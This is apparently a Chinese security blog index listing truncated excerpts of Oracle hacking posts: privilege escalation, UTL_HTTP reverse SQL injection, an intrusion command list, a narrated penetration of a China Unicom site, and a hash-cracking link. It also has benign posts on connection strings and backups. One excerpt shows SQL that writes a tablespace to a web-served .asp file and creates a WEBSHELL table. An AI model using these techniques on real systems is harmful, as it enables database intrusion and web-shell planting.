黑面小窝

作者：菜牛
收到约镐通知，刚好正研究ORACLE 课题，而国内网上相关主题不是很多，所以就写了此
文，本文详细演示了针对linux 和windows 两种主流操作系统的ORACLE 提权过程，希望
对想了解ORACLE 但又不知道从何入手的朋友有帮助。对于管理员来说，也可以参考此文
看自己的数据库有否存在文中漏洞。
orACLE 数据库简介：
orACLE 是以高级结构化查询语言(SQL)为基础的大型关系数据库,它使用SQL(Structured

More...

===========================================
SQL ODBC connection strings

Standard Security:

“Driver={SQLServer};Server=Your_Server_Name;Database=Your_Database_Name;Uid=Your_Username;Pwd=Your_Password;”

More...

作者：山东信息安全小组 Black.Eagle               
声明：笔者在与该网站的站长及负责人联系后做的测试，征得对方同意后放出文章

估计大家读了《oracle注入实战之渗透联通》一文之后都会为之一震，但是笔者不知道读者朋友有没有遇到过和笔者相似的情况，就是用union select语句爆全部的表的时候，根本爆不出来，最多也就能爆出几个来，那该怎么继续呢？这里就用到了我们的UTL_HTTP反弹注射。

More...

SQL> create tablespace kjtest datafile ‘e:\website\kj.asp’
size 100k nologging ;

这样就创建了Table 空间。

这里需要注意的是oracle的Table，最小单位是100K。

下面开始建表:

SQL> CREATE TABLE WEBSHELL(C varchar2(100)) tablespace tian6;

More...

议题作者：pt007
信息来源：邪恶八进制
   最近遇到一个使用了oracle数据库的服务器,在狂学oracle+请教高手后终于搞到了网站后台管理界面的所有用户密码,我发现oracle操作起来真是太麻烦,为了兄弟们以后少走些弯路,我把入侵当中必需的命令整理出来,一个星期的心血,版权所有,转载请注明作者.
1、su – oracle 不是必需，适合于没有DBA密码时使用，可以不用密码来进入sqlplus界面。
2、sqlplus /nolog 或sqlplus system/manager 或./sqlplus system/manager@ora9i;

More...

在夜枫兄弟的邀请下,对中国联通网站的一次安全渗透测试。下面我将渗透测试的过程详细的写出来，以供新手朋友学习。水平还停留在完全依赖黑客工具入侵的朋友可要努力了。

渗透之前的信息刺探的少不了的，但是我这里就不用大型黑客扫描软件，因为大型扫描软件发送大量的数据包，容易阻塞网络，有时候要视情况而定。那我们直接从WEB系统下手。打开联通的站点,站点做点做的很漂亮。一看程序是JSP的,意料之内，因为很多大型站点都爱用JSP构架的。打开谷歌搜索引擎，收集该站的动态页面。然后逐个测试每个动态连接看是否存在注入漏洞。经过我的仔细检测终于有所发现。这个地址链接是城市专栏的地址,提交一个单引号立即报错了。然后用经典的and 1=1测试返回正常如图1：

More...

在线破解Oracle Hash站 http://ops.conus.info:669/   

更多咨询可以访问主站，可以自己下载作者开发的破解工具http://www.conus.info/

More...

Oracle数据库有三种标准的备份方法，它们分别是导出／导入（EXP/IMP）、热备份和冷备份。导出备件是一种逻辑备份，冷备份和热备份是物理备份。

一、 导出／导入（Export／Import）

利用Export可将数据从数据库中提取出来，利用Import则可将提取出来的数据送回到Oracle数据库中去。

１、 简单导出数据（Export）和导入数据（Import）:

Oracle支持三种方式类型的输出：

（１）、表方式（T方式），将指定表的数据导出。

More...